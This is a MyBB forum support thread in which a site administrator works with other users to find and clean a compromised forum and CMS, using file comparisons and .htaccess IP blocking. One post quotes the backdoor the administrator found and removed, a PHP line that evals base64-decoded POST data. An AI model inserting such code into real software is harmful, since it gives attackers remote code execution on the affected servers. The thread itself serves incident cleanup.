MyBB Community Forums

It's not the iframe itself, but the contents that would trigger an alert.

As long as you know the websites are safe, there is no problem. Just make sure that no other files have been modified.

How can I find out if the contents would trigger an alert ?
The other forums and its contents are clean.

How do I make sure that no other files have been modified?

(2011-10-16, 01:22 PM)Ruby Wrote: [ -> ]How can I find out if the contents would trigger an alert ?

Well, firstly if there is an iframe that you didn't add, then it obviously shouldn't be there. Secondly, if a virus scanner or AV triggers an alert when viewing your site, then there is malicious code.

(2011-10-16, 01:22 PM)Ruby Wrote: [ -> ]The other forums and its contents are clean.

Then we can put aside the possibility of them being a threat.

(2011-10-16, 01:22 PM)Ruby Wrote: [ -> ]How do I make sure that no other files have been modified?

http://community.mybb.com/thread-105780.html

Read below Run a folder comparison using difference software

(2011-10-16, 01:28 PM)Malcolm. Wrote: [ -> ]Well, firstly if there is an iframe that you didn't add, then it obviously shouldn't be there.

There are only those iFrames, I put there.

(2011-10-16, 01:28 PM)Malcolm. Wrote: [ -> ]Secondly, if a virus scanner or AV triggers an alert when viewing your site, then there is malicious code.

No AV scanner on my machine has ever triggered on our website, nowhere !

(2011-10-16, 01:28 PM)Malcolm. Wrote: [ -> ]http://community.mybb.com/thread-105780.html
Read below Run a folder comparison using difference software

I know this thread, I posted there too. I ran the Diffmerge comparison. It came up with this result on the forum:

"Status","[...]\forums\","[..]\mybb_1604\Upload\"," 358 Identical / 373 Different / 1948 Files Without Peers / 182 Folders

OFF TOPIC : with due respect to the original poster, I'd suggest to seek support from
someone experienced (I wish someone from support team could spare some time ...)
by providing required temporary privileges

I would be very glad if someone who is experienced in healing an infected forum like this one could help me, now.

Please contact me per PM to get the required temporary privileges.

---------------

I just downloaded a fresh version of MyBb and our forums
and compared both once again. Now, we have 268 different files. I clicked on View > Compare selected files, please have a look to the screen shot.
The only difference seems to be a sign???

... nobody who has time to help me?

" The only difference seems to be a sign " <-- that symbol has nothing to do in comparing files here !!

as you have removed the infections from myBB files, now you have to check
the main site [CMS] files and any other scripts used on the server ...

OK, but please why does DiffMerge come up with some hundred different files? I did not change them until now, because I don't now, how to do that.

---

I was scanning our CMS now, there are only 11 different files and the only difference on these files is this line on the end of the file replacing the php end code:

if (isset($_POST['update'])) {eval(base64_decode($_POST['update'])); exit;}

There is no

?>

---

Looking for the Code, I posted here, on Google, I found this website with a lot of interesting tips: Versatile .CC Attacks | Unmask Parasites. Blog

I manually edited this very malicious code off-line, to prevent from further disturbances
I got the upload of the cleaned up files.

But now I need to know something from you, I want to change my .htaccess file

By the moment I have this code inside:

# -FrontPage-

IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*

<Limit GET POST>
order deny,allow
deny from all
allow from all
</Limit>
<Limit PUT DELETE>
order deny,allow
deny from all
</Limit>

I want to add these lines

# Begin IP blocking #
Order Allow,Deny
Deny from 74.220.219.113
Deny from 98.130.0.160
Allow from all
# End IP blocking #

Could you please give me the good whole code for the new .htaccess file

... and then I am going on to clean up our server...

Perhaps I ought to mention, that I made a backup of all files and folders of our server, the day before I ran the upgrade of MyBB .. these files do not show up any differences. Differences came later in October 2011.